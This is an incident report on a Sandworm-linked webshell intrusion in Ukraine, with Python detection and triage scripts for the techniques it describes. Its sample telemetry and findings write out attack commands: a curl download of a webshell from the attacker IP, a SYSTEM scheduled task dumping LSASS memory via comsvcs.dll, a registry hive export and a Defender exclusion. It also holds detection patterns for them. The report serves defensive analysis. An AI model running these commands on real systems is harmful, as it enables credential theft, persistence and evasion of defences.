Attackers are gaining access using a custom, Sandworm-linked webshell and are making heavy use of Living-off-the-Land tactics to maintain persistent access.
# Incident Report: Sandworm-Linked Webshell Intrusion in Ukrainian Organizations
## Executive Summary
Threat actors, potentially linked to the Russian Sandworm group, conducted targeted, multi-stage intrusions against Ukrainian organizations, including a large business services firm and a local government entity. Access was achieved via custom webshells deployed on public-facing servers, followed by heavy reliance on Living-off-the-Land (LotL) techniques to achieve persistence and conduct reconnaissance. The primary goal appeared to be harvesting sensitive information and maintaining long-term network presence.
## Incident Details
- Discovery Date: Not stated; the investigation was opened after activity first observed on June 27, 2025.
- Incident Date: Initial malicious activity observed on June 27, 2025.
- Affected Organization: A large business services organization (primary focus of timeline) and a local government organization.
- Sector: Business Services, Local Government.
- Geography: Ukraine.
## Timeline of Events
### Initial Access
- Date/Time: June 27, 2025
- Vector: Likely exploitation of unpatched vulnerabilities on public-facing servers, followed by webshell deployment (the specific vulnerability is not identified in the report).
- Details: Attackers used `curl` to download a webshell named `service.aspx` from `185.145.245[.]209` and install it on the server. One identified webshell, Localolive, is linked to a Sandworm subgroup.
### Lateral Movement
- Date/Time: June 29, 2025 (and subsequent activity)
- Vector: Internal reconnaissance and presumed lateral movement.
- Details: After establishing persistence on the first host, attackers performed extensive reconnaissance (e.g., `Get-AdComputer -filter *`) and shortly after moved to a second internal computer, checking for security software presence.
### Data Exfiltration/Impact
- Date/Time: Ongoing after initial access.
- Details: The goal was harvesting sensitive information. Attackers attempted memory dumping via scheduled tasks and exported the HKLM system registry hive, suggesting an intent to steal credentials and configuration data.
### Detection & Response
- Date/Time: Investigation initiated by the Threat Hunter Team following observed activity.
- Details: Detection relied on analyzing network connections and file creations on the affected hosts. Specific containment and eradication actions taken against these intrusions are not detailed in the source; the Response Actions section below lists the standard steps that apply.
## Attack Methodology
- Initial Access: Deployment of custom webshells (e.g., Localolive, `service.aspx`) likely via web application exploitation.
- Persistence: Creation of a recurring scheduled task (`schtasks /create`) set to run every 30 minutes using the `SYSTEM` context with the highest privilege level (`/rl highest`).
- Privilege Escalation: Implied by the ability to create a scheduled task running as `SYSTEM` with highest rights, and a Windows Defender exclusion rule applied.
- Defense Evasion: Adding a Windows Defender exclusion for the user's Downloads folder (`Add-MpPreference -ExclusionPath CSIDL_PROFILE\downloads`, where `CSIDL_PROFILE` is the telemetry placeholder for the user profile directory) so that downloaded tools are not scanned. Heavy reliance on LotL tactics.
- Credential Access: Attempted memory dumping via scheduled task (`rundll32.exe c:\windows\system32\comsvcs.dll, minidump...`) and registry hive extraction (`reg.exe save hklm\system...`).
- Discovery: Extensive use of native OS tools like `whoami`, `tasklist`, `systeminfo`, `arp -a`, and Active Directory enumeration (`powershell Get-AdComputer -filter *`).
- Lateral Movement: Checking for security products (Symantec) on subsequent hosts and enumerating user files.
- Collection: Gathering password hashes/credentials via memory dumps and system configuration via registry extraction.
- Exfiltration: Not explicitly detailed, but implied by the objective of "harvesting sensitive information."
- Impact: Espionage and establishing long-term backdoor presence.
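The techniques above reduce to a small set of process-creation behaviors that can be detected without signatures. The following is an added example, not code from the report or from the Threat Hunter Team: Python detection rules run over constructed Sysmon-style process-creation records. Host names, the PID and dump path in the `/tr` payload, the service account, and the download URL path are assumptions for illustration; the IP, the task name `asd` and the command lines echo the report's findings.

```python
"""Behavioral detection for the LotL chain in this report, run over constructed
process-creation events (Sysmon Event ID 1 / EDR equivalent fields).
Added example; not the report's or the vendor's code."""
import re
from collections import Counter
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """One process-creation record."""
    host: str
    parent: str     # parent image file name
    image: str      # image file name
    cmdline: str    # full command line as logged


WEB_SERVERS = {"w3wp.exe", "httpd.exe", "nginx.exe", "tomcat.exe"}
LOLBINS = {"cmd.exe", "powershell.exe", "pwsh.exe", "curl.exe", "rundll32.exe",
           "whoami.exe", "reg.exe", "schtasks.exe", "tasklist.exe", "systeminfo.exe"}


def _has(pattern, s):
    return re.search(pattern, s, re.I) is not None


# (rule name, ATT&CK technique, predicate over the whole event). Rules key on
# behavior (parent/child pairing, argument shapes), not on file hashes.
RULES = [
    ("webshell_parent", "T1505.003",
     lambda e: e.parent.lower() in WEB_SERVERS and e.image.lower() in LOLBINS),
    ("curl_webroot", "T1505.003",
     lambda e: _has(r"\bcurl(?:\.exe)?\b.*?(?:-o|--output)\s+\S+\.(?:aspx?|php|jspx?)\b", e.cmdline)),
    ("schtasks_system_highest", "T1053.005",
     lambda e: _has(r"schtasks(?:\.exe)?\s+/create\b", e.cmdline)
               and _has(r'/ru\s+"?(?:nt authority\\)?system\b', e.cmdline)
               and _has(r"/rl\s+highest\b", e.cmdline)),
    ("comsvcs_minidump", "T1003.001",
     lambda e: _has(r"comsvcs\.dll\s*,\s*minidump\b", e.cmdline)),
    ("reg_save_hive", "T1003.002",
     lambda e: _has(r"\breg(?:\.exe)?\s+save\s+hklm\\(?:sam|system|security)\b", e.cmdline)),
    ("defender_exclusion", "T1562.001",
     lambda e: _has(r"add-mppreference\b.*-exclusion(?:path|process|extension)", e.cmdline)),
    ("ad_enum", "T1018",
     lambda e: _has(r"get-ad(?:computer|user|group)\b.*-filter\s+\*", e.cmdline)),
]


def detect(events):
    """Return one hit dict per (event, matching rule)."""
    hits = []
    for e in events:
        for name, technique, pred in RULES:
            if pred(e):
                hits.append({"host": e.host, "rule": name, "technique": technique,
                             "image": e.image, "cmdline": e.cmdline})
    return hits


def rule_counts(events):
    """Rule name -> number of events that tripped it."""
    return Counter(h["rule"] for h in detect(events))


# Constructed sample telemetry. Host names, PID 624, dump path, service account and
# the URL path are made up; the IP and task name 'asd' are the report's IoCs.
MALICIOUS_EVENTS = [
    ProcEvent("web01", "w3wp.exe", "cmd.exe",
              r"cmd.exe /c curl http://185.145.245.209/s -o C:\inetpub\wwwroot\service.aspx"),
    ProcEvent("web01", "w3wp.exe", "cmd.exe", "cmd.exe /c whoami"),
    ProcEvent("web01", "cmd.exe", "schtasks.exe",
              r'schtasks /create /tn asd /tr "rundll32.exe c:\windows\system32\comsvcs.dll, MiniDump 624 c:\users\public\ls.dmp full" /sc minute /mo 30 /ru SYSTEM /rl highest /f'),
    ProcEvent("web01", "cmd.exe", "powershell.exe",
              r"powershell Add-MpPreference -ExclusionPath C:\Users\svc_web\Downloads"),
    ProcEvent("web01", "cmd.exe", "reg.exe", r"reg.exe save hklm\system C:\Users\Public\sys.hiv"),
    ProcEvent("web01", "cmd.exe", "powershell.exe", "powershell Get-AdComputer -filter *"),
]
BENIGN_EVENTS = [
    ProcEvent("fs01", "svchost.exe", "schtasks.exe",
              r"schtasks /create /tn NightlyBackup /tr C:\Tools\backup.exe /sc daily /st 02:00 /ru CORP\svc_backup"),
    ProcEvent("ws07", "explorer.exe", "powershell.exe", "powershell Get-MpPreference"),
    ProcEvent("ws07", "cmd.exe", "reg.exe", r"reg.exe query hklm\software\microsoft\windows\currentversion\run"),
]

if __name__ == "__main__":
    for h in detect(MALICIOUS_EVENTS + BENIGN_EVENTS):
        print(f"{h['host']:6} {h['rule']:24} {h['technique']:10} {h['cmdline'][:70]}")
```

The `webshell_parent` rule only looks at the direct parent, so `whoami.exe` spawned by a `cmd.exe` that was itself spawned by `w3wp.exe` is caught through the `cmd.exe` event, not its own; an EDR that records full process ancestry lets the rule be applied at any depth. Legitimate SYSTEM tasks exist, so `schtasks_system_highest` is a triage rule that gains precision when combined with a suspicious `/tr` payload or a web-server ancestor.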
## Impact Assessment
- Financial: Not disclosed.
- Data Breach: Highly likely unauthorized access and collection of sensitive information, including credentials harvested from memory and system configurations.
- Operational: Potential disruption from the attackers' ongoing presence and from weakened security configuration (e.g., the Windows Defender exclusion), which must be found and reverted.
- Reputational: Targeted organizations may suffer reputational damage due to the nature of the espionage activity.
## Indicators of Compromise
- File indicators (SHA-256):
  - Localolive webshell: `636e04f0618dd578d107f440b1cf6c910502d160130adae5e415b2dd2b36abcb`
  - PowerShell backdoor (one example hash): `cf8e09f013fcb5f34c8c274bf07d9047956ba441dabf2d3de87ea025e14058b7`
- Network indicators:
  - Initial access IP: `185.145.245[.]209`
  - Domain observed: `ciscoheartbeat[.]com` (likely a C2/staging domain)
## Response Actions
- Containment measures: Not explicitly detailed in the source; they would involve isolating compromised hosts, blocking the attacker IP and domain, and removing the deployed webshells.
- Eradication steps: Removal of the attacker's scheduled task (named `asd`) and any other persistence mechanisms, and scanning for the full set of deployed executables and backdoors.
- Recovery actions: Removing the Defender exclusion, resetting credentials that may have been exposed by the memory dumps and registry hive export, and patching the vulnerabilities used for initial access.
## Lessons Learned
- The heavy reliance on Living-off-the-Land binaries (LOLBins) and dual-use tools makes detection challenging, necessitating focus on behavioral analysis rather than just signature matching.
- The use of custom, Sandworm-linked tools suggests a sophisticated, state-sponsored actor demanding high-level threat intelligence integration.
- Unpatched public-facing applications were the likely initial access vector; prompt patching would have removed it.
## Recommendations
- Immediately review and patch all web-facing applications susceptible to known vulnerabilities, as this was the likely vector.
- Implement behavioral monitoring across endpoints to detect anomalous use of legitimate tools such as `cmd.exe`, `powershell.exe`, `schtasks.exe`, `rundll32.exe`, and `reg.exe` (e.g., memory dumping via `comsvcs.dll`, registry hive saves, Defender exclusion changes), especially when they are spawned by a web server process.
- Enhance Privileged Access Management (PAM): run web applications under low-privileged service accounts and restrict the right to create scheduled tasks as `SYSTEM`, so that a compromised web process cannot install SYSTEM-level persistence.
- Develop specific detection rules for the identified webshell file hashes and network indicators.
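As an added example of the hunting the last two recommendations call for (not code from the report or the vendor), the Python below parses scheduled-task definition XML (the files under `C:\Windows\System32\Tasks` or the output of `schtasks /query /xml`) for the persistence pattern described in this report, and hashes files under a web root against the report's SHA-256 indicators. The attacker task XML, the benign task, the PID and dump path, and the web-root file are constructed for the example.

```python
"""Host triage for the persistence and webshell indicators in this report.
Added example; not the report's or the vendor's code."""
import hashlib
import os
import re
import tempfile
import xml.etree.ElementTree as ET

TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
SYSTEM_IDS = {"S-1-5-18", "SYSTEM", "NT AUTHORITY\\SYSTEM"}

# SHA-256 indicators from this report.
IOC_SHA256 = {
    "636e04f0618dd578d107f440b1cf6c910502d160130adae5e415b2dd2b36abcb": "Localolive webshell",
    "cf8e09f013fcb5f34c8c274bf07d9047956ba441dabf2d3de87ea025e14058b7": "PowerShell backdoor",
}

# Task actions matching the credential-access / defense-evasion commands in the report.
SUSPICIOUS_ACTION = re.compile(
    r"comsvcs\.dll\s*,\s*minidump|\breg(?:\.exe)?\s+save\s+hklm|add-mppreference", re.I)


def task_findings(task_xml):
    """Return human-readable findings for one scheduled-task definition (XML text)."""
    root = ET.fromstring(task_xml)

    def text(path):
        el = root.find(path, TASK_NS)
        return (el.text or "").strip() if el is not None else ""

    user = text("t:Principals/t:Principal/t:UserId")
    run_level = text("t:Principals/t:Principal/t:RunLevel")
    interval = text(".//t:Repetition/t:Interval")   # ISO 8601 duration, e.g. PT30M
    action = f"{text('t:Actions/t:Exec/t:Command')} {text('t:Actions/t:Exec/t:Arguments')}".strip()

    findings = []
    if user.upper() in SYSTEM_IDS and run_level == "HighestAvailable":
        findings.append("runs as SYSTEM with highest available privileges")
    if interval:
        findings.append(f"repeats every {interval}")
    if SUSPICIOUS_ACTION.search(action):
        findings.append(f"suspicious action: {action}")
    return findings


def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest()


def hash_matches(root_dir, iocs=IOC_SHA256):
    """Walk a directory (e.g. a web root); return (path, label) for files whose SHA-256 is in iocs."""
    matches = []
    for dirpath, _, files in os.walk(root_dir):
        for name in files:
            path = os.path.join(dirpath, name)
            label = iocs.get(sha256_file(path))
            if label:
                matches.append((path, label))
    return matches


# Constructed task definitions in the schema schtasks.exe writes. PID 624 and the dump path are made up.
ATTACKER_TASK_XML = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><TimeTrigger><Repetition><Interval>PT30M</Interval></Repetition>
    <StartBoundary>2025-06-27T10:00:00</StartBoundary><Enabled>true</Enabled></TimeTrigger></Triggers>
  <Principals><Principal id="Author"><UserId>S-1-5-18</UserId><RunLevel>HighestAvailable</RunLevel></Principal></Principals>
  <Actions Context="Author"><Exec><Command>rundll32.exe</Command>
    <Arguments>c:\windows\system32\comsvcs.dll, MiniDump 624 c:\users\public\ls.dmp full</Arguments></Exec></Actions>
</Task>"""
BENIGN_TASK_XML = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><CalendarTrigger><StartBoundary>2025-01-01T02:00:00</StartBoundary><ScheduleByDay><DaysInterval>1</DaysInterval></ScheduleByDay></CalendarTrigger></Triggers>
  <Principals><Principal id="Author"><UserId>CORP\svc_backup</UserId><RunLevel>LeastPrivilege</RunLevel></Principal></Principals>
  <Actions Context="Author"><Exec><Command>C:\Tools\backup.exe</Command></Exec></Actions>
</Task>"""


def demo_hash_check():
    """Drop a constructed file into a temporary 'web root' and match it against a constructed
    IoC set; the report's real hashes are checked too and, for constructed content, do not match."""
    with tempfile.TemporaryDirectory() as webroot:
        sample = os.path.join(webroot, "service.aspx")
        with open(sample, "wb") as f:
            f.write(b'<%@ Page Language="C#" %> constructed sample, not a real webshell')
        constructed_iocs = {sha256_file(sample): "constructed test sample"}
        real_hits = hash_matches(webroot)
        test_hits = hash_matches(webroot, constructed_iocs)
        return len(real_hits), [label for _, label in test_hits]


if __name__ == "__main__":
    for name, xml_text in (("asd", ATTACKER_TASK_XML), ("NightlyBackup", BENIGN_TASK_XML)):
        print(name, task_findings(xml_text) or "no findings")
    print(demo_hash_check())
```

Hash matching only finds the exact samples the report lists; a recompiled or re-obfuscated webshell will not match, which is why the task and behavior checks sit alongside it. On a live host, point `task_findings` at every file under `C:\Windows\System32\Tasks` and review every task that runs as SYSTEM with `HighestAvailable`, not just those whose action matches the regex.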